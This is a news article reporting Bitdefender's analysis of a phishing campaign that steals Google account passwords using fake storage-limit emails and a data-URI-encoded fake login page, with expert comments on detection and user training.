Thousands affected as phishers steal Google passwords

Hackers are stealing Google account passwords by using "enhanced" phishing attacks, according to security researchers.

Thousands affected as phishers steal Google passwords
Thousands affected as phishers steal Google passwords

Anti-virus vendor Bitdefender detailed the scheme in a blog post on Monday, and said that hackers are relying on “new and better crafted” phishing attacks, which primarily affects Google Chrome and Mozilla Firefox internet browsers, to compromise Google account users.

“With access to users' Google accounts, hackers can buy apps on Google Play, hijack Google+ accounts and access confidential Google Drive documents,” said Catalin Cosoi, chief security strategist, in a statement. “The scam starts with an email allegedly sent by Google, with “Mail Notice” or “New Lockout Notice” as a subject.”

These emails warn the user that their account will be “locked in 24 hours” because their account has reached the full email capacity. The user is, as a result, urged to go to the “INSTANT INCREASE” link which - on clicking - redirects them to a page masquerading as Google's official web log-page. Credentials are then gathered by the hackers within the browser.

Cosoi notes that what's particularly interesting about the attack is that it is difficult to detect with traditional heuristic detection, and for users to notice, with the bogus webpage going undetected by Google's Chrome uniform resource identifiers (URIs).

Bitdefender says that the scammers are able to avoid detection, by using a data URI scheme, which includes data in-line web pages as if they are external sources. Content from the fake webpage is encoded in the string with the data URI scheme, and Base64 is used to represent the file contents.

The decoding is eventually done by the browsers, but by which point it is too late.

So how many Google users have been affected by this phishing campaign? “So far, more than a thousand users clicked on a single shortened URL used in the cyber-campaign. The numbers are without doubt a lot higher, as scammers create more than a single URL when crafting a phishing wave,” Cosoi told SCMagazineUK.com.

He added that phishing attacks are becoming the new norm, a view which chimes with Kaspersky Lab's most recent report, which found that a third of phishing attacks are designed to hijack personal details which can then be used to steal money.

“Phishing used to be the ugly duckling of the e-threat landscape. According to our research, even social media users are becoming more aware of phishing than before,” he said.

“This is one of the reasons why cyber-criminals are trying to make phishing attacks harder to detect by both victims and antivirus software. They try to better imitate the authentic websites of the targeted institutions and they also try to optimise their email targeting. In the recent Orange France cyber-attack, they first breached its technical platform to gain access to a vast amount of sensitive data and eventually started to target victims via email. In Google's case, cyber-crooks seem to be using a database loaded with Google accounts."

It is, however, hard for Google and other email providers to rectify, he says.

“Google and other email providers are trying to cope with such security issues, but as soon as they ban a spam sample or block a phishing attack – new ones are created. Cyber-criminals are active workers and continue to find new methods of bypassing email providers to gain access to more data that they may eventually transform into money. Stopping this kind of attack is mostly done by integrating anti-spam and anti-phishing technologies, but email providers have a hard time blocking every dangerous e-mail, as this is not their main job.”

Responding to the news, PhishMe VP Scott Greaux told SCMagazineUK.com that training in phishing and spear phishing is the answer here, something backed up by recent research which revealed that only 20 percent of UK office workers knew what phishing was.

“As with most phishing emails, this attack is targeting humans and relies on emotional bait to get the user to react,” Greaux said.

“Addressing risky email consumer behaviour is the only way to address this type of attack and traditional awareness methods continue to fail with both consumer and organisational email users.  Immersing consumers in benign spear-phishing experiences allows them to learn at a deeper cognitive level and changes behavior making it easier to identify, avoid and report suspicious emails.  

He added: "Organisations who adopt this method of training are able to reduce their human attack surface and reduce incident response costs, all while adding a new source to their threat intelligence ecosystem.”